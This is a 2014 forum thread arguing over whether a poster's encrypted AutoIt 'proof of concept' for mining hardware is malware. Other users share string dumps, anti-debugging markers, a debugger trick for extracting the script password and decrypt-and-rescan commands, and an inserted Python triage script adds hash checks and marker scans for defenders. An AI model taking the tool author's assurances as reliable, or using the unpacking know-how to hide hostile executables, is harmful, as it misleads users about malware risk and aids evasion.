- Download whatever executable file online, for example Firefox installer.
- Scan with virustotal = 0/50
- Disassemble the exe or rar
- Remove the commented lines
- Modify the script to have the contents of the installer
- Remove some lines
- Send the decrypted file to virustotal = bam, at least 40/50

Every single executable known file in virustotal that gets modified with even 1 bit will get an instant alert.
That is the main reason why you can't fake EXE file assembly without triggering an alert.

Also notice our hashes:

My hash : A5F3453E03DD2E4F356BEC7FB595B799A8EA6BE2C0466CE8550C74E247511870
Your hash: abbf75859716dbbe564d3b250aa7dfcb14c4b8f452257bd382e6a4187120a9a3

You scanned a "*.BIN" file. You could have uploaded WHATEVER file you wanted to upload.
Hashcheck is not the same, so it is not the same file, period. That's called faking results.

Your file contains at least 15 DLL files that are not even present in my code!

THESE are the files included:

Try this second method:

Create any .NET project
Google some UPnP / network scanning methods/modules/classes
Compile and send to virustotal = bam, 40/50

So please, you have no idea what you are talking about.
You still failed to post the actual exploit code also.

You post the source from the crypter ITSELF to scare people, but you also fail to post the configuration file for it, so they can see i'm not using ANY of these 'scary' functions.

At most, you can be considered a medium skilled cracker, but that is where this story ends for you ici_lemmy.
Cracking, hacking and decompiling is more than running some cracked tools you found on thepiratebay.

ici_lemmy
January 28, 2014, 06:38:54 PM
 #116

As I said, I have no more time to lose with that...
I'm absolutely sure that you are a script kiddie trying to infect computers and I explained how to verify what I'm saying (quickly, I have to admit) so anybody, skilled enough, can check for himself...

Now if people are dumb enough to download your tool and run it on their actual computer, there is nothing more I can do...
steve15 (OP)
January 28, 2014, 06:40:48 PM
 #117

As I said, I have no more time to lose with that...
I'm absolutely sure that you are a script kiddie trying to infect computers and I explained how to verify what I'm saying (quickly, I have to admit) so anybody, skilled enough, can check for himself...

Now if people are dumb enough to download your tool and run it on their actual computer, there is nothing more I can do...

Just explain why you uploaded a whole different file, containing more than 15 DLL files that are NOT in my file.
Explain why your upload contains a Remote Service Application, for example.

Your posts are worth nothing, dude. Get lost. And see my edits above in my last post.

Chancellor
January 28, 2014, 07:20:10 PM
 #118

Now if people are dumb enough to download your tool and run it on their actual computer, there is nothing more i can do...
Regardless of what is really contained in this file (and it looks fishy indeed), the above quote is the most important thing. Steve15, if you wanted to play fair, you should disclose the vulnerability as a whole and in detail. Then:
1. Miners would know what the danger really is, without running some encrypted, suspicious executables. Then they can react fast and protect their rigs.
2. KNC would be forced to patch their firmware quickly, if really needed.
3. You would be acknowledged as the discoverer and would show your real pentesting skill.
I would go for disclosure, especially as you said that KNC tried to hide the problem under the carpet. Instead, the fact is the whole story is directed by you in a way that tries to encourage people to run some encrypted, probably dangerous, application. As ici_lemmy said, if they are dumb enough, well...

nuno12345
January 28, 2014, 10:39:43 PM
 #119

One last shot...

AutoIt script MD5 pass: 1baba19a29b940f09293c9f47030d79c

AutoIt script, encrypted code:
Code:
">>>AUTOIT SCRIPT<<<"
"wb"
"%.15g"
"0x%p"
"True"
"False"
"%s (%d) : ==> %s.: %s %s"
"Line %d:"
"Line %d  (File "%s"):"
"Error: "
"AU3_FreeVar"
....
"SeDebugPrivilege"

More at 001FE0D0

Processor/virtual env check
Address=001A6A16, Destination=kernel32.IsProcessorFeaturePresent

Debugger check stages
Address=0019D7C6, Destination=kernel32.IsDebuggerPresent
Address=001A7DB7, Destination=kernel32.IsDebuggerPresent
Address=001B1EE1, Destination=kernel32.IsDebuggerPresent

I guess your autoit exe has all the protection on the exe itself and an additional encryption on the AutoIt script inside, but your file needs to run it so it must know the password or how to decrypt it.

Long long shot, open Exe2Aut in a debugger (you'll need to unpack it with UPX first). Breakpoint at 0x004026B9 and hit the "Decompile" button. When the debugger breaks you will have the password at the top of the stack.
ici_lemmy
January 28, 2014, 11:05:58 PM
 #120

Linux :
Code:
$unzip minerProofOfConcept.zip
$unrar e minerProof.exe
$sed '/^;/d' crLyJ > tmp.au3
$nano tmp.au3
# ^^ modify to keep only the _crypt_* functions and the call to _crypt_decryptdata with the right parameters
$cp * /windows/

And under windows :
Code:
>lmsqQw.exe tmp.au3

Send the resulting file to any antivirus...

You'll see for yourself
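The two posts above (nuno12345's dump of the strings and imports in the executable, and ici_lemmy's decrypt-and-rescan procedure) both come down to the same defensive routine: first confirm that the bytes on your disk are the bytes whose hash was published, then look for the markers that make an unknown binary worth treating as hostile before it ever runs. The following Python is an added example, not code from the thread or from any of the posters. The byte blob is constructed here to carry the same kind of markers nuno12345's dump shows (the AutoIt script header, SeDebugPrivilege, the IsDebuggerPresent and IsProcessorFeaturePresent imports); the hash comparison uses the SHA-256 value steve15 posted only to illustrate a mismatch, since a scan result says nothing about a file unless the hashes agree.

```python
import hashlib
import re

# Constructed sample standing in for an unpacked AutoIt executable.
# It is NOT the file from the thread; it only embeds the kind of markers
# that the posted dump shows, separated by non-printable filler.
SAMPLE_BYTES = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b">>>AUTOIT SCRIPT<<<\x00"
    + b"\x00" * 8
    + b"SeDebugPrivilege\x00"
    + b"kernel32.dll\x00IsDebuggerPresent\x00IsProcessorFeaturePresent\x00"
    + b"\x01\x02\x03" * 16
    + b"short\x00"  # below the minimum string length, so it is ignored
)

# Markers worth flagging in a first-pass triage of an unknown binary,
# with the reason each one matters to a defender.
INDICATORS = {
    ">>>AUTOIT SCRIPT<<<": "compiled AutoIt script (decompile with Exe2Aut)",
    "SeDebugPrivilege": "requests debug privilege (process tampering)",
    "IsDebuggerPresent": "anti-debugging check",
    "IsProcessorFeaturePresent": "CPU / virtual environment probing",
}


def extract_strings(data: bytes, min_len: int = 6) -> list:
    """Return printable ASCII runs of at least min_len bytes, like the `strings` tool."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, data)]


def find_indicators(data: bytes) -> dict:
    """Map every indicator present in the binary's strings to its description."""
    found = {}
    for s in extract_strings(data):
        for marker, why in INDICATORS.items():
            if marker in s:
                found[marker] = why
    return found


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256 of the bytes, the value to compare against a published hash."""
    return hashlib.sha256(data).hexdigest()


def same_file(published_hash: str, data: bytes) -> bool:
    """True only if the bytes hash to the published value (hex case is irrelevant)."""
    return sha256_hex(data).lower() == published_hash.strip().lower()


def triage(data: bytes, published_hash: str) -> dict:
    """Hash check plus indicator scan; run this before anyone executes the file."""
    return {
        "sha256": sha256_hex(data),
        "matches_published_hash": same_file(published_hash, data),
        "indicators": find_indicators(data),
    }


if __name__ == "__main__":
    # Hash steve15 posted for his file. The constructed bytes will not match it,
    # which is exactly the case where a scan of "the tool" proves nothing.
    STEVE15_HASH = "A5F3453E03DD2E4F356BEC7FB595B799A8EA6BE2C0466CE8550C74E247511870"
    report = triage(SAMPLE_BYTES, STEVE15_HASH)
    print("sha256:", report["sha256"])
    print("matches published hash:", report["matches_published_hash"])
    for marker, why in report["indicators"].items():
        print(f"  {marker!r}: {why}")
```

Run it against a real download by replacing SAMPLE_BYTES with the file's contents; a hash mismatch means the two sides of the argument are scanning different files, and a hit on the anti-debugging or privilege markers is a reason to hand the sample to a sandbox rather than a production machine.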
steve15 (OP)
February 01, 2014, 11:37:22 AM
 #121

Moderator please remove this topic

Source code of the project has been sold. I no longer support the application or its source in any way.
The buyer claims he will make the source public soon to prevent massive scale attacks.

Thank you.
